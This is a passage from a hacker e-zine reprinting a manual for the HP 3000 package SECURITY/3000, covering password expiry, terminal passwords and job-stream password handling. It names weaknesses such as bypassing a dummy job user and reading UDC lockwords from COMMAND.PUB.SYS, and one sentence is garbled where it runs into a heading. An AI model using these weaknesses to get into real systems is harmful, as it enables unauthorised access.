  707.  
  708.  
  709.  
  710.  
  711.  
  712.                  :::::::::::::::::::::::::::::::::::::::::::::
  713.                  :: HP's 'SECURITY/3000' System  (part 2/3) ::
  714.                  ::                                         ::
  715.                  ::               by Sterling               ::
  716.                  ::                                         ::
  717.                  :::::::::::::::::::::::::::::::::::::::::::::
  718.  
  719. SECURITY/3000 is a third party security package for use on HP 3000 series
  720. computers.  It replaces several commands and bundles several utility programs
  721. to monitor system security.  HP's are quite a common site on X.25, so this may
  722. add to your understanding of what's going on.  Part 1 of this manual can be
  723. found in Informatik #02.  In this second section, I will discuss several of the
  724. companion utilities that SECURITY/3000 uses to protect logins and passwords.
  725.  
  726.  
  727. OBSOL - MPE passwords OBSOLESCENCE system
  728. *****************************************
  729.  
  730. INTRODUCTION
  731. ~~~~~~~~~~~
  732. A password is only as good as the people who are supposed to keep it secret.
  733. The fact of the matter is that in most shops, MPE passwords get out "through
  734. the grapevine" within a month or so at most.  By the end of the month, the
  735. passwords have to be changed to ensure security.
  736.  
  737. OBSOL, the Password Obsolescence System, guarantees that passwords are changed
  738. frequently, and system security is thus maintained.
  739.  
  740.  
  741. HOW OBSOL WORKS
  742. ~~~~~~~~~~~~~~
  743. An Account Manager or the System Manager determines the number of days a given
  744. password (user, group, or account) is valid before it must be changed (the
  745. period called "obsolescence days"), and the number of days before the password
  746. becomes obsolete that the user will be warned that the password will expire
  747. (the period called "warning days").
  748.  
  749. Whenever a user logs on during a period when the password should be changed, he
  750. is notified on what date the password will expire and then is allowed on the
  751. system.  If he logs on after the password has expired, he is disallowed access
  752. to the system.
  753.  
  754. Every time an Account or System Manager changes a user, group, or account
  755. password, he is prompted for the "obsolescence days" and "warning days" which
  756. should be applied for that password, and the password obsolescence system is
  757. updated automatically.
  758.  
  759.  
  760. WHAT HAPPENS AT LOGON TIME
  761. ~~~~~~~~~~~~~~~~~~~~~~~~~
  762. Whenever a user logs on during a period when either or both his user or account
  763. passwords should be changed, he is notified that the password(s) will expire
  764. and is then allowed on the system, as follows:
  765.  
  766.      ***********************************************************
  767.  
  768.      Your xxxxxxxx password will expire on mm/dd/yy!
  769.  
  770.      ***********************************************************
  771.  
  772. where 'xxxxxxxx' is the type of password (user, group or account), 'mm/dd/yy'
  773. is the obsolescence (expiration) date.
  774.  
  775. If a user logs on after the group or account password has expired, he is
  776. disallowed access to the system and the following message is displayed:
  777.  
  778.  
  779.      ***********************************************************
  780.  
  781.      Your xxxxxxxx password has expired!
  782.  
  783.      You will not be able to sign on until it is changed.
  784.  
  785.      ***********************************************************
  786.  
  787. where 'xxxxxxxx' is the type of password (user, group, account).
  788.  
  789. The password obsolescence system will not warn a user about the group password
  790. if the group he is logging into is his home group--this is in keeping with MPE,
  791. which does not prompt a user for his home group password, even if one exists.
  792. By the same token, a user will not be disallowed access to a group, if that
  793. group is his home group, even if the password has expired.  In general, a user
  794. will be warned to change only those passwords which he is prompted for at
  795. logon.
  796.  
  797.  
  798. OBSOL/PASCHG INTERFACE
  799. ~~~~~~~~~~~~~~~~~~~~~
  800. OBSOL works well with PASCHG, the system which permits users to change their
  801. own MPE user passwords, since with PASCHG the Account Manager is not burdened
  802. with having to change dozens of passwords at the end of every month.  In order
  803. to provide additional ease in making certain that passwords are changed, OBSOL
  804. may be configured to automatically run PASCHG during the password warning
  805. period.
  806.  
  807.  
  808. ACTIVATING OBSOL
  809. ~~~~~~~~~~~~~~~
  810. The core of the password obsolescence system is two UDC files.
  811.  
  812. The first one is an option logon UDC which runs the program
  813.  
  814.      OBSLOG.PUB.SECURITY
  815.  
  816. which checks whether any of the passwords of the user who is logging on are
  817. obsolete.
  818.  
  819. The UDC is stored in the file OBSOLUDC.PUB.SECURITY
  820.  
  821. OBSLOGON
  822. OPTION LOGON, NOBREAK
  823. SETJCW SECURITYANSWER=0
  824. RUN OBSLOG.PUB.SECURITY
  825. IF SECURITYANSWER = 1  THEN
  826.    BYE
  827. ENDIF
  828.  
  829. and should be set for a user, account, or the entire system; e.g.  to set it
  830. for the logon account, the Account Manager can do the following:
  831.  
  832.      :SETCATALOG OBSOLUDC.PUB.SECURITY;ACCOUNT
  833.  
  834. It's recommend that the system manger set this UDC on an account-by-account
  835. basis.
  836.  
  837. The second set of UDCs redefines all MPE :NEWUSER, :NEWGROUP, :NEWACCT,
  838. :ALTUSER, :ALTGROUP, and :ALTACCT commands to run the program
  839.  
  840.      OBSCHG.PUB.SECURITY
  841.  
  842. which updates the password obsolescence system whenever one of these commands
  843. is executed.
  844.  
  845. These UDCs are stored in the file
  846.  
  847.      OBSUDC.PUB.SECURITY
  848.  
  849. and are usually set systemwide so that all :ALTxxx and :NEWxxx commands are
  850. redefined throughout the system.  To do this, log on as MANAGER.SYS and execute
  851. the command
  852.  
  853.       :SETCATALOG OBSUDC.PUB.SECURITY,.. your UDCs...;SYSTEM
  854.  
  855.  
  856. CONFIGURING OBSOL
  857. ~~~~~~~~~~~~~~~~
  858. The default "obsolescence days" and "warning days" is set by declaring them in
  859. the SECURITY/3000 configuration file
  860.  
  861.       SECURMGR.PUB.SECURITY
  862.  
  863. as follows:
  864.  
  865.      OBSDAYS=obsdays
  866.      WARNDAYS=warndays
  867.  
  868. where 'obsdays' is the number of days that a password is valid for before it is
  869. obsoleted (default is '30') and 'warndays' is the number of days before a
  870. password expiration is warned about.
  871.  
  872.  
  873. EXCLUDING CERTAIN PASSWORDS FROM OBSOLESCENCE
  874. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  875. If you want to have some passwords expire automatically and others not, you can
  876. accomplish this by declaring a long period of time (e.g.  1000 days) as the
  877. "obsolescence days" for that password.
  878.  
  879. Only entities (users, groups, and accounts) in MPE which have passwords are
  880. included in the password obsolescence system--those without MPE passwords are
  881. not included in the internal data base when it is filled.  In keeping with
  882. this, when a password is removed from an entity in MPE, the entry corresponding
  883. to that entity is removed from the data base.  Similarly, when anDS; ADDING AND
  884. ALTERING USERS, GROUPS, AND ACCOUNTS
  885.  
  886. When adding or altering users, groups, and accounts in OBSOL, the :NEWUSER,
  887. :NEWGROUP, :NEWACCT, :ALTUSER, :ALTGROUP, and :ALTACCT commands are used as in
  888. MPE, except the syntax is slightly different:  the body of the command must be
  889. enclosed in quotation marks, as in
  890.  
  891.      :NEWUSER "CLERK;PASS=XYZZY;CAP=ND,SF,IA,BA"
  892.  
  893. and
  894.  
  895.      :ALTACCT "DEV;PASS=FOO;CAP=AM,AL,GL,ND,SF,IA,BA,PH,DS"
  896.  
  897. These commands are redefined by UDCs to not only execute the command but, if
  898. the command changes a password, to inform OBSOL that the password has been
  899. changed and that it should be obsoleted when the "obsolescence days" have
  900. passed.  Therefore, it is not necessary to explicitly run a special program to
  901. inform OBSOL every time a password is changed.
  902.  
  903. When you execute a :NEWxxx or :ALTxxx commmand, the command is processed
  904. normally and you are prompted for "obsolete days" and "warning days" as
  905. follows:
  906.  
  907.      Password is currently obsoleted every od days; new value:
  908.  
  909. Where 'od' is the current "obsolescence days".  Enter the new period for which
  910. the password should be valid before it is obsoleted, or hit <return> to retain
  911. the same value as before.
  912.  
  913.      Warning period before obsolescence is wd days; new value:
  914.  
  915. Where 'wd' is the current "warning days".  Enter the new number of days before
  916. a password expires that the user should be warned to have the password changed,
  917. or hit <return> to retain the same value as before.
  918.  
  919. So, for example, if you want to change the GAMES account password, and you want
  920. the new password to be obsoleted every 2 months (60 days) and a warning message
  921. that the password is about to expire displayed during the 5 days before the
  922. password will expire, execute the command:
  923.  
  924.      :ALTACCT "GAMES;PASS=FUNTIME"
  925.  
  926. and respond to the prompts as follows:
  927.  
  928.      Password is currently obsoleted every 30 days; new value: 60
  929.      Warning period before obsolescence is 7 days; new value: 5
  930.  
  931. For a more critical password on a more sensitive account, such as the PAYROLL
  932. account, you may want to obsolete the password every 14 days with 3 days of
  933. warning, as follows:
  934.  
  935.      :ALTACCT "PAYROLL;PASS=BIGBUCKS"
  936.  
  937. and then answer the prompts as follows:
  938.  
  939.      Password is currently obsoleted every 30 days; new value: 14
  940.      Warning period before obsolescence is 7 days; new value: 3
  941.  
  942.  
  943. WHAT IS DONE WHEN A PASSWORD EXPIRES
  944. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  945. If a user password has been obsoleted (expired), the user should have his
  946. Account Manager change the password to permit the user to log on.  If an
  947. account password has been obsoleted, the Account Manager should have the System
  948. Manager change that password to permit users of that account to log on.
  949.  
  950. In a situation where a user password of an Account Manager or of the System
  951. Manager has expired, there is no one with the capabilities to change the
  952. password; therefore, it is necessary to modify the internal data base according
  953. to the following example:
  954.  
  955.      1.  :HELLO MANAGER.SECURITY,DATA
  956.  
  957.      2.  :RUN QUERY.PUB.SYS
  958.          >BASE=OBSOL
  959.          PASSWORD= >>;    << enter a ';' >>
  960.          MODE = >>1
  961.  
  962.      3.  >FIND USER+ACCT ="MANAGER VESOFT  "    << if USER password >>
  963.          >FIND ACCT+GROUP="VESOFT  DEV     "   << if GROUP password >>
  964.          >FIND ACCT=VESOFT                   << if ACCOUNT password >>
  965.  
  966.      4.  >REPLACE OBS-DAYS="500"; END
  967.          >EXIT
  968.  
  969. This will temporarily "un-obsolete" the password, allowing the Account or
  970. System Manager to log on.  Once logged on, he should change the password and
  971. re-define "obsolescence days" when prompted.
  972.  
  973.  
  974. ACCESSING THE OBSOL DATA BASE
  975. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  976. The password obsolescence data base is
  977.  
  978.      OBSOL.DATA.SECURITY
  979.  
  980. and contains the following data sets:
  981.  
  982.      OBS-ACCT
  983.      OBS-USER
  984.      OBS-GROUP
  985.  
  986. The data base contains information about all the passworded users, groups, and
  987. accounts on the system.  IT DOES NOT CONTAIN THE MPE PASSWORDS.  The valid data
  988. items are as follows:
  989.  
  990.      LAST-CHG-DATE     the date (in YY/MM/DD format) that the password
  991.                        was last changed
  992.      OBS-DAYS          number of obsolescence days
  993.      WARN-DAYS         number of warning days
  994.  
  995. Ignore DUMMY1, DUMMY2, and FILLER--they're just there for SECURITY/3000's
  996. convenience.
  997.  
  998. For added security, it is normally recommended that the system manger change
  999. the data base password (as follows) and the password obsolescence system will
  1000. still be able to (magically!) access the data base:
  1001.  
  1002.      :HELLO MANAGER.SECURITY,DATA
  1003.      :RUN DBUTIL.PUB.SYS
  1004.      >>SET OBSOL PASSWORD 1=password
  1005.      >>EXIT
  1006.  
  1007.  
  1008. TERMPASS -- passwords DIAL-UPs, terminals, DS lines, LANs, etc.
  1009. ***************************************************************
  1010.  
  1011. INTRODUCTION
  1012. ~~~~~~~~~~~
  1013. With the current explosion in datacom and with HP providing all supported sites
  1014. with telesupport modems, nearly every HP3000 site has dial-up access.
  1015.  
  1016. With the added benefits and convenience that dial-up access provides, a whole
  1017. new world of security considerations emerges:  the system is threatened not
  1018. only by users within your company or on your premises, but by anyone with a
  1019. terminal or microcomputer, a telephone, and a modem!
  1020.  
  1021. With the current wave of computer crime and the new breed of "hackers" whose
  1022. enjoyment comes from wreaking havoc <sic> on computer systems, special security
  1023. must be placed on dial-up lines.
  1024.  
  1025. TERMPASS implements this extra security not only on dial-up lines but on DS
  1026. lines, terminals, and anything else that supports interactive communication
  1027. (MTS, LAN, X.25, etc.).  Unfortunately, although MPE permits user, account, and
  1028. group passwords, it does not allow one to set terminal passwords.  TERMPASS
  1029. allows the System Manager to set a password on any LDEV, which must be answered
  1030. correctly by the user at logon time to gain access to the system.
  1031.  
  1032. In addition, it allows you to marry the high level of user authentication that
  1033. the Logon Security System provides with the terminal and dial-up security that
  1034. TERMPASS gives you.  You can implement the Logon Security System not only on
  1035. certain accounts and certain users, but also based on which device a user is
  1036. logging on to.
  1037.  
  1038.  
  1039. HOW TERMPASS WORKS
  1040. ~~~~~~~~~~~~~~~~~
  1041. TERMPASS is configured by specifying which LDEVs are to be passworded and what
  1042. the passwords are.  Then set a systemwide logon UDC which will run the TERMPASS
  1043. program whenever users log on.
  1044.  
  1045. Whenever a user logs on to a terminal which has been configured with a
  1046. password, after he correctly answers required MPE passwords, he is prompted for
  1047. the terminal password for that terminal.  If he answers correctly, he is
  1048. allowed on the system.  If he answers incorrectly, he is denied access to the
  1049. system (i.e.  logged off, an inverse-video message describing the failed logon
  1050. attempt is sent to the console, and an entry is logged to the SECURITY/3000 log
  1051. file.
  1052.  
  1053.  
  1054. SETTING PASSWORDS ON SPECIFIC LDEVs
  1055. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1056. You can configure TERMPASS by specifying which terminals are to be passworded
  1057. and what the passwords are.  To do this, build the file
  1058.  
  1059.      TERMPASS.DATA.SECURITY
  1060.  
  1061. with your editor, and add one line for each terminal to be passworded in the
  1062. format
  1063.  
  1064.      LDEV password
  1065.  
  1066. where 'LDEV' is the logical device number of the terminal (e.g.  '20') to be
  1067. passworded and 'password' is the password (e.g.  'OPERONLY').  Any terminal not
  1068. included in this file will remain unpassworded.
  1069.  
  1070. So, for example, if you created the TERMPASS data file in your editor as
  1071. follows:
  1072.  
  1073.      :EDITOR
  1074.      /ADD
  1075.          1     20 OPERONLY     << the console >>
  1076.          2     21 WARGAMES     << a dial-up line >>
  1077.          3     22 XYZZY        << a terminal >>
  1078.          4     65 KEEPOUT      << a DS line >>
  1079.          5     //
  1080.      /KEEP TERMPASS.DATA.SECURITY,UNN
  1081.      /EXIT
  1082.  
  1083. then the passwords specified would be placed on the corresponding LDEVs.
  1084.  
  1085. AFTER YOU /KEEP THIS FILE (AND AFTER ANY SUBSEQUENT /KEEPs), YOU MUST
  1086.  
  1087.      :ALTSEC TERMPASS.DATA.SECURITY;(R,X,A,L,W:CR)
  1088.  
  1089. THIS IS EXTREMELY IMPORTANT!  IF YOU DO NOT DO THIS, ANYBODY WILL BE
  1090. ABLE TO READ THIS FILE!  YOU MAY ALSO USE A LOCKWORD TO PROTECT
  1091. THIS FILE:
  1092.  
  1093.      :RENAME TERMPASS.DATA.SECURITY, TERMPASS/lockword.DATA.SECURITY
  1094.  
  1095.  
  1096. DISABLING A TERMINAL WITH AN ATTEMPTED REMOTE LOGON VIOLATION
  1097. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1098. If a user is unsuccessful in logging on through a dial-up line or an inhouse
  1099. terminal configured with TERMPASS, it is often desirable to "hang" that LDEV or
  1100. terminal so that further logon attempts are not possible.
  1101.  
  1102. To do this, determine the time in seconds for which you would like the LDEV or
  1103. terminal hung and then add a line to the TERMPASS.DATA.SECURITY file in the
  1104. format:
  1105.  
  1106.      PAUSE=numseconds
  1107.  
  1108. where 'numseconds' is the number of seconds for which the terminal will be
  1109. hung.  Then, when a user has an unsuccessful logon attempt, he will be hung for
  1110. the amount of time specified.
  1111.  
  1112. By default, 'numseconds'=0 which means that the user will not be hung at all.
  1113.  
  1114.  
  1115. SPECIFYING NUMBER OF ATTEMPTS TO ANSWER TERMINAL PASSWORD
  1116. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1117. You may specify the number of attempts users are allowed to answer the terminal
  1118. password at logon by adding a line to the TERMPASS.DATA file in the format:
  1119.  
  1120.      TIMES=attempts
  1121.  
  1122. where 'attempts' is the number of times the terminal password will be asked.
  1123.  
  1124. By default, 'attempts'=1.
  1125.  
  1126.  
  1127. LOGGING SUCCESSFUL REMOTE LOGONS
  1128. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1129. You may wish to know who is logging on through the dial-up line, or whether a
  1130. particular logon is being utilized.  You may also feel relieved to see that an
  1131. unsuccessful attempt is directly followed by a successful attempt, meaning that
  1132. the error was probably a typo.  You may enable SECURITY/3000 to log successful
  1133. logons which pass through the TERMPASS program by adding a line to the
  1134. TERMPASS.DATA.SECURITY file in the format:
  1135.  
  1136.      LOG-LOGON=ON
  1137.  
  1138. This keyword will be seen by the REMOTE security system and cause all
  1139. successful logons to be written to the LOG.DATA.SECURITY file for later review.
  1140. No other configuration is required and this keyword may be added or removed at
  1141. any convenient time.  When the log file is later reviewed (see HOW TO LIST THE
  1142. SECURITY LOG FILE in the LOGON section of this manual) the message:
  1143. 'SUCCESSFUL REMOTE LOGON' will be displayed.
  1144.  
  1145.  
  1146. INVOKING THE LOGON SECURITY SYSTEM VIA TERMPASS
  1147. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1148. Generally, the Logon Security System in SECURITY/3000 (personal profile
  1149. passwords, time, day, and menu restrictions) are imposed on certain users and
  1150. accounts by setting a UDC (SECURUDC.PUB.SECURITY) on that user or account; then
  1151. all the users who have that UDC set must go through SECURITY/3000 to log on
  1152.  
  1153. However, you can also impose the Logon Security System on users logging on to
  1154. certain devices instead of (or in addition to) users on which SECURUDC has been
  1155. set.  Say, for example, you want to have the Logon Security System run EITHER
  1156. on the users/accounts on which you've set SECURUDC OR on any accesses to the
  1157. system from certain LDEVs (e.g.  dial-up modem ports, DS line ports, terminal
  1158. ports, etc).  For example, to set things up so that anybody who EITHER uses the
  1159. PAYROLL account OR signs on to LDEV 36 (or both) will have to go through the
  1160. Logon Security System, declare a line in the TERMPASS configuration file,
  1161. TERMPASS.DATA.SECURITY, which looks like this:
  1162.  
  1163.      36 SECRET $SECURITY
  1164.  
  1165. Note that LDEV 36 still has a terminal password ("SECRET"); but, because there
  1166. is a '$SECURITY' keyword on that line means that IN ADDITION TO TERMPASS asking
  1167. the terminal password, the Logon Security System will always be run for all
  1168. logons to LDEV 36.
  1169.  
  1170. If you want to, you can implement the Logon Security System on an LDEV without
  1171. placing a password on that LDEV - just omit the terminal password ("SECRET")
  1172. while keeping the $SECURITY keyword, leaving the line looking like
  1173.  
  1174.      36 $SECURITY
  1175.  
  1176. Note that you still have to set the TERMPASS UDC (TERMUDC.PUB.SECURITY) on a
  1177. system-wide basis, since it's the TERMPASS program that checks the
  1178. TERMPASS.DATA.SECURITY file and invokes SECURITY/3000's Logon Security System
  1179. if it finds the $SECURITY keyword associated with the logon LDEV.
  1180.  
  1181. So, for example, TERMPASS.DATA.SECURITY might look like:
  1182.  
  1183.      20 OPERONLY
  1184.      25 $SECURITY
  1185.      36 SECRET $SECURITY
  1186.  
  1187. This would mean that LDEV 20 has the password "OPERONLY" but won't have
  1188. SECURITY/3000 automatically invoked; 36 has the password "SECRET", and anybody
  1189. who logs on to it would have to go through the Logon Security System; and LDEV
  1190. 25 has no terminal password, but all people who use it will be checked by the
  1191. Logon Security System.
  1192.  
  1193. Meanwhile, SECURUDC is still set on the PAYROLL account, and on whatever other
  1194. users or accounts you want to always be secured; the Logon Security System will
  1195. be run on them whether or not the user is using LDEV 25 or 36.
  1196.  
  1197. Of course, every user who will ever go through the Logon Security System - this
  1198. includes every user who will ever sign on to LDEV 25 or 36--must be put into
  1199. the SECURITY database using the ADD option of USER.PUB.SECURITY.  This actually
  1200. is quite good, since it gives you the opportunity to allow only certain users
  1201. to use LDEV 25 or 36 - just authorize only those users, and all others will be
  1202. automatically forbidden.
  1203.  
  1204. Note that the Logon Security System can thus be called either from the TERMPASS
  1205. UDC (TERMUDC.PUB.SECURITY) you set up on a system-wide basis or the Logon
  1206. Security System UDC (SECURUDC.PUB.SECURITY) you set up on each account or user.
  1207. What if a user signs on to a secured account using a secured terminal?  Well,
  1208. you don't want to make him go through the Logon Security System twice, so if
  1209. the Logon Security System was already run via TERMPASS, it won't be run again.
  1210.  
  1211.  
  1212. STREAMX/3000 - ELIMINATES THE NEED TO EMBED PASSWORDS AND OTHER
  1213.                SENSITIVE INFORMATION IN JOB STREAMS
  1214. ************************************************************************
  1215.  
  1216. INTRODUCTION
  1217. ~~~~~~~~~~~
  1218. In MPE, all job streams must contain the passwords for the user, account, and
  1219. group under which they are to be streamed.  Needless to say, this is a huge
  1220. security hole because anyone who has READ access to the file can look at it and
  1221. see the passwords.  What's more, any listing of the job stream (of which plenty
  1222. are liable to be laying around the computer room) contains the password.
  1223.  
  1224. Furthermore, although MPE passwords are not echoed to the screen when you log
  1225. on, they are when you're working on a job stream in the editor.  Who is looking
  1226. over your shoulder at your password on the screen?  If you are working on a job
  1227. and walk away from your terminal, who can read it?  Do you always clear the
  1228. screen when you walk away from the terminal--or even when you log off?
  1229.  
  1230. More importantly, since changing a password means having to change every single
  1231. job stream that contains it, MPE passwords are virtually guaranteed never to be
  1232. changed.
  1233.  
  1234. Some HP3000 sites work around this problem in a variety of ways, few of which
  1235. are very effective.  A common "solution" is to create a dummy user (e.g.
  1236. 'JOB') who exists solely for the purpose of streaming jobs, and remove his IA
  1237. capability--this can be gotten around quite easily by logging on with a :JOB
  1238. command and prefixing every command with a ':'.  Others try to use the MPE file
  1239. security to restrict READ access to job stream files, but forget to :ALTSEC the
  1240. file to replace the file security after every /KEEP of the file (which waives
  1241. the prior file security).
  1242.  
  1243.  
  1244. THE SOLUTION
  1245. ~~~~~~~~~~~
  1246. STREAMX/3000 closes this security hole by eliminating the need to embed MPE
  1247. passwords in job streams.  It also eliminates the need to embed other sensitive
  1248. information in job streams, such as data base passwords, file lockwords,
  1249. :REMOTE HELLO passwords, etc.  STREAMX also adds flexibility to job streams by
  1250. allowing you to pass parameters.
  1251.  
  1252. The logical alternative to embedding passwords in job streams is to prompt for
  1253. the passwords at :STREAM time, just as session passwords are prompted for at
  1254. :HELLO time.  This is what STREAMX does.  And to make life easier, if you have
  1255. enough capabilities to retrieve the passwords, they will be answered for you
  1256. automatically.
  1257.  
  1258.  
  1259. HOW STREAMX WORKS
  1260. ~~~~~~~~~~~~~~~~
  1261. When you stream a job, STREAMX will analyze the job stream, as well as all the
  1262. job streams streamed by it, and will prompt you for all the passwords needed as
  1263. well as any parameters for which you have instructed STREAMX to prompt.  Then,
  1264. it will incorporate the passwords and parameters into the job stream (without
  1265. changing the actual disc file), and then stream it.
  1266.  
  1267. As in MPE, the output file of the job stream will not contain the passwords.
  1268.  
  1269. Naturally, STREAMX will not prompt you for passwords that do not exist.  If the
  1270. job stream already has the correct passwords embedded in it, those passwords
  1271. will not be prompted for; on the other hand, if the passwords embedded in the
  1272. stream are incorrect, they will be prompted for.  This permits you to change
  1273. your MPE passwords and begin using STREAMX right away.
  1274.  
  1275. Also, if you have enough capabilities to retrieve the passwords in MPE (via
  1276. :LISTUSER, :LISTACCT and :LISTGROUP or LISTDIR), STREAMX will automatically
  1277. generate the passwords without any prompting (because, after all, you can find
  1278. them out anyway).  This means that if you are an Account Manager streaming a
  1279. job in your account or an ordinary user streaming a job with the same user ID,
  1280. STREAMX will automatically generate the passwords (because you had to know them
  1281. to sign on).  If you are the System Manager (or have SM capability), STREAMX
  1282. will never prompt you for a password because you can retrieve any password on
  1283. the system.
  1284.  
  1285.  
  1286. WHICH USER STREAMED A JOB? (ENHANCED JOB $STDLIST)
  1287. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1288. STREAMX will enhance the $STDLIST of a job to contain some additional
  1289. information.  The logon user ID of the user streaming the job and the LDEV from
  1290. which the job was streamed will be written to the job's output file, e.g.
  1291.  
  1292.      :COMMENT   STREAM FILE UPDATE.PUB.PAYROLL
  1293.      :COMMENT   STREAMED BY JOAN,CLERK.PAYROLL,PUB ON LDEV 26
  1294.  
  1295. so you can determine not only who the job logged on as, but also who actually
  1296. streamed it.  If the job stream was launched from another job stream, the user
  1297. ID (from the !JOB card) of the first job stream will be written to the output
  1298. file, as well as the user who streamed that job stream.
  1299.  
  1300.  
  1301. PERMITTING THE SYSTEM OPERATOR TO STREAM ANY JOB STREAM
  1302. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1303. In many installations, the system operator (OPERATOR.SYS) is responsible for
  1304. streaming system job streams which accomplish backups, etc.  STREAMX will
  1305. prompt the operator for the password for each !JOB card; but you may not want
  1306. to disclose various passwords to the operator.
  1307.  
  1308. As you know, STREAMX will not prompt for the passwords if a user has enough
  1309. capabilities to retrieve them, e.g.  MANAGER.SYS can stream any job on the
  1310. system without being prompted for the passwords; but you do not want to give
  1311. your operator SM capability to accomplish the streaming of system job streams.
  1312.  
  1313. A good solution is to put all the system job streams in a special
  1314. group, e.g.  JOB.SYS, and set up a UDC which the operator will use to stream
  1315. the jobs which will also temporarily allow the user SM capability for the
  1316. duration of streaming the job.
  1317.  
  1318. The following UDC runs the GOD.PUB.VESOFT program which gives the user SM
  1319. capability, then runs STREAMX to stream the job, and then runs
  1320. MORTAL.PUB.VESOFT to reset the user's capabilities to their original state.
  1321. Notice that the UDC is OPTION NOBREAK and contains a CONTINUE command so that
  1322. after the program GOD is run, there is a very high probability that the
  1323. capability reduction program MORTAL will execute.  This increase and subsequent
  1324. guaranteed reduction of capability is what makes this UDC successful.  Notice
  1325. also that the UDC has the option NOLIST.  If the operator could see the text of
  1326. the UDC executing, then the operator would know the lockword to the program
  1327. GOD.  Additionally, the UDC option NOHELP has been specified to prevent the
  1328. operator from :HELP OPSTRM which also reveals the program GOD's lockword.
  1329.  
  1330.      OPSTREAM filename
  1331.      OPTION NOHELP, NOLIST, NOBREAK
  1332.      FILE STRMFILE=!FILENAME.JOB.SYS
  1333.      RUN GOD/lockword.PUB.VESOFT
  1334.      CONTINUE
  1335.      RUN STREAMX.PUB.SECURITY;PARM=1
  1336.      RUN MORTAL.PUB.VESOFT
  1337.      RESET STRMFILE
  1338.  
  1339. There are two other important technical issues to be mentioned.  First, the
  1340. operator should not be able to write to, nor save a file into the controlled
  1341. group JOB.SYS.  Otherwise, the operator could create a job stream which logs on
  1342. as MANAGER.SYS and LISTDIR's all the MPE passwords.  If the operator has write
  1343. access, there is no need to save a special file into the controlled group
  1344. JOB.SYS - just write over one that is already there.  Second, the operator
  1345. should not have READ access to the UDC file which contains the lockword to the
  1346. program GOD.  If both these points are maintained, the operator will not be
  1347. able to circumvent the intent.  Note also that in order to :SETCATALOG a UDC
  1348. file you must have READ and LOCK access to it.  This means that an ordinary
  1349. setcatalog of the UDC file will not provide adequate security (read access is
  1350. not permissable).  The solution is to use a LOCKWORD to protect the UDC file
  1351. OPSTRM.  This means you can release the file and then assign it a lockword.
  1352. Now when you :SETCATALOG the file, you must specify the lockword also (e.g.
  1353. :SETCATALOG OPSTRM/secret).
  1354.  
  1355. BUT - the file COMMAND.PUB.SYS has read access for all users, thus it can be
  1356. scanned and the lockwords with which UDC's are set can be determined.  Also -
  1357. if someone is reading this file (say, with FCOPY, QUAD, etc.), another process
  1358. cannot resolve its UDC catalog.  This is especially of concern where OPTION
  1359. LOGON UDCs are invoking SECURITY.  Be sure to reduce the general access to
  1360. COMMAND.PUB.SYS so that the file may only be Locked and Xecuted - by :ALTSEC
  1361. COMMAND.PUB.SYS;(L,X:ANY).
  1362.  
  1363. So - with this UDC set for the operator, whenever the operator types
  1364.  
  1365.      :OPSTREAM filename
  1366.  
  1367. the job stream filename.JOB.SYS will be streamed and the passwords needed on
  1368. the !JOB card will be resolved automatically - regardless of the job's logon
  1369. user ID.
  1370.  
  1371.  
  1372. LOCKWORDS
  1373. ~~~~~~~~
  1374. Just as you shouldn't embed passwords into your job streams, you shouldn't
  1375. embed lockwords, either.  If you have a lockword on, say, QUERY.PUB.SYS, you
  1376. might have a line in your job stream like
  1377.  
  1378.    !RUN QUERY/?WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS
  1379.  
  1380. Or, even better, you can say
  1381.  
  1382.    !RUN QUERY/?$NOECHO$ WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS
  1383.  
  1384. which won't echo the user's response.
  1385.  
  1386. However, STREAMX has an even better way of doing this!  If you say
  1387.  
  1388.    !RUN ?$LOCKWORD=QUERY.PUB.SYS$?
  1389.  
  1390. then STREAMX will automatically ask the user for the QUERY.PUB.SYS lockword, or
  1391. -- if the user is the system manager or the account manager of the SYS account
  1392. (the account in which QUERY.PUB.SYS resides) -- automatically supply the
  1393. lockword.  This is just like the way STREAMX treats :JOB card passwords -- it
  1394. asks for them when necessary, but automatically supplies them when appropriate.
  1395. For instance, if the person streaming the job stream has SM capability and the
  1396. QUERY.PUB.SYS lockword is FROBOZZ, STREAMX will automatically convert the
  1397.  
  1398.    !RUN ?$LOCKWORD=QUERY.PUB.SYS$?
  1399.  
  1400. to a
  1401.  
  1402.    !RUN QUERY/FROBOZZ.PUB.SYS
  1403.  
  1404. On the other hand, if the streaming user doesn't have SM/AM capability, STREAMX
  1405. will prompt him with
  1406.  
  1407.    WHAT IS THE LOCKWORD OF THE FILE 'QUERY.PUB.SYS'?
  1408.  
  1409. and will use the user's answer (entered without echo, of course) as the
  1410. lockword to be put into the job stream.
  1411.  
  1412.  
  1413. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1414.  
  1415.  
  1416.  
  1417.  
  1418.  
  1419. -------------------------------------------------------------------------------
  1420.   ______            __                            __          _
  1421.     /   /          /  )                          /  )        //
  1422.  --/   /_  _      /  / _  ______  ________      /  / o __.  // _  __
  1423. (_/   / /_</_    /__/_</_/ / / <_(_) / / <_    /__/_<_(_/|_</_</_/ (_
  1424.  
  1425. -------------------------------------------------------------------------------
  1426.  
  1427. Thanks to Durkatlon for the translation to English.  The article comes courtesy
  1428. of Hacktik Magazine issues #16 an #17.  If you can use it, cool, if not, skip
  1429. on to the next article.  This is the form in which I received the file.  I have
  1430. not tested or used this, as yet.  Guess that gives me something for another
  1431. article.
  1432.  
  1433. -------------------------------------------------------------------------------
  1434.  
  1435.  
  1436.  ----------------------------------------------------------------------------
  1437. / From Vodka, the Absolut drinking, Alpine smoking, information specialist.. \
  1438. |                                                                            |
